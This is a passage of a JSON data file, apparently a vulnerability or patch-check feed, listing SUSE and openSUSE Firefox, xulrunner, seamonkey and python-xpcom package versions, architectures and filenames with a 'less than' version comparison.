"mozilla-xulrunner190-debuginfo-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debuginfo-32bit", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.s390x.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "i586", "packageFilename": "MozillaFirefox-debugsource-3.0.18-0.1.i586.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.i586.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.s390x.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ia64", "packageFilename": "MozillaFirefox-3.5.8-0.3.ia64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ia64", "packageFilename": "MozillaFirefox-3.5.8-0.1.1.ia64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.2", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.0.18-0.1.2.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.4.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.2", "arch": "x86_64", "packageFilename": "MozillaFirefox-debuginfo-3.0.18-0.1.2.x86_64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "python-xpcom191-debuginfo-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "python-xpcom191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-debugsource-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-debuginfo-32bit-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-debuginfo-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "s390x", "packageFilename": "MozillaFirefox-3.5.8-0.3.s390x.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-debuginfo-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-translations-common-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "0.6-0.1.2", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-kde4-debugsource-0.6-0.1.2.x86_64.rpm", "packageName": "mozilla-xulrunner191-kde4-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.ppc.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "i586", "packageFilename": "seamonkey-debuginfo-2.0.3-0.1.1.i586.rpm", "packageName": "seamonkey-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-3.0.18-0.1.ppc.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-translations-32bit-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-debuginfo-32bit-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-debuginfo-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ia64", "packageFilename": "MozillaFirefox-translations-3.5.8-0.1.1.ia64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.5.8-0.4.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.0.18-0.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "s390x", "packageFilename": "MozillaFirefox-debugsource-3.5.8-0.1.1.s390x.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-debugsource-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.i586.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ppc", "packageFilename": "MozillaFirefox-3.5.8-0.3.ppc.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-debugsource-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "s390x", "packageFilename": "MozillaFirefox-3.5.8-0.1.1.s390x.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.1.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-x86-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-translations-32bit-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ia64", "packageFilename": "MozillaFirefox-translations-3.5.8-0.4.1.ia64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-debugsource-2.0.3-0.1.1.x86_64.rpm", "packageName": "seamonkey-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.0.18-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-debuginfo-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.1", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-3.0.18-0.1.1.ppc.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-debuginfo-x86-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-debuginfo-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-debuginfo-32bit-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-debuginfo-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.i586.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-gnomevfs-x86-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "0.6-0.1.2", "arch": "i586", "packageFilename": "mozilla-xulrunner191-kde4-debugsource-0.6-0.1.2.i586.rpm", "packageName": "mozilla-xulrunner191-kde4-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-translations-32bit-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-translations-64bit-1.9.0.18-0.1.ppc.rpm", "packageName": "mozilla-xulrunner190-translations-64bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.ppc.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "s390x", "packageFilename": "MozillaFirefox-translations-3.5.8-0.3.s390x.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-translations-3.5.8-0.1.1.ppc64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "i586", "packageFilename": "seamonkey-debugsource-2.0.3-0.1.1.i586.rpm", "packageName": "seamonkey-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.ia64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-translations-x86-1.9.1.8-1.1.1.ia64.rpm", "packageName": "mozilla-xulrunner191-translations-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "i586", "packageFilename": "seamonkey-dom-inspector-2.0.3-0.1.1.i586.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-2.0.3-0.1.1.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-gnomevfs-32bit-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": 